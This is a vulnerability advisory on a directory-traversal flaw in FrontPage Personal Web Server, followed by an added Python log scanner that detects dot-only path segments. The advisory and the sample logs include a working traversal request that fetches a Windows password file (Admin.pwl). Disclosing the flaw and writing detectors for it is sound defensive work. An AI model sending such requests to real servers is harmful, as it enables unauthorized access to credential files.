FrontPage Personal Web Server on Windows
Input validation error
Unauthorized file access
Packetstorm, Bugtraq
Description: Doubledot bug in FrontPage Personal Web Server.
Compromise: Accessing drive through browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926; other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive, your drive could be accessed by any user accessing your page, simply by requesting any file in any directory except the files in the FrontPage directories, especially /_vti_pvt/.
How to exploit this bug?
Simply by adding /..../ to the URL in the address bar.
http://www.target.com/..../
So by requesting http://www.target.com/..../Windows/Admin.pwl the webserver lets us download the .pwl file from the target.
Files and dirs. with the hidden attribute set are vulnerable.
Solution:
The best solution is installing FrontPage on a drive that doesn't contain private information.
Greetings,
Jan van de Rijt aka The Warlock.
Attack string
GET /..../Windows/Admin.pwl HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.i-pi.com
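
Added example, not part of the original advisory: a Python log scan that flags request paths containing a dot-only segment such as the /..../ in the attack string. A normalizer that compares segments only against ".." treats "...." as an ordinary name, so this check matches any segment made of two or more dots. The Common Log Format lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def dot_segments(target):
    """Return path segments made only of dots (length >= 2), e.g. '..' or '....'."""
    path = fully_decode(target.split("?", 1)[0])
    # Windows servers accept both separators, so split on '/' and '\'.
    segments = re.split(r"[/\\]+", path)
    return [s for s in segments if len(s) >= 2 and set(s) == {"."}]

def scan(log_lines):
    """Yield (client, target, segments) for every request with a dot-only segment."""
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = dot_segments(m.group("target"))
        if hits:
            yield line.split(" ", 1)[0], m.group("target"), hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.htm HTTP/1.0" 200 1043',
    '192.0.2.66 - - [01/Jan/2000:10:00:05 +0000] "GET /..../Windows/Admin.pwl HTTP/1.1" 200 688',
    '192.0.2.66 - - [01/Jan/2000:10:00:09 +0000] "GET /%2e%2e%2e%2e/Windows/ HTTP/1.1" 200 2210',
    '192.0.2.10 - - [01/Jan/2000:10:00:12 +0000] "GET /docs/v1..2/notes.htm HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Jan/2000:10:00:15 +0000] "GET /a/.../b HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(f"{client} requested {target!r}: dot-only segments {hits}")
```

A 200 response to a flagged request, as in the second sample line, is the case to triage first, since it means the server returned content for the path.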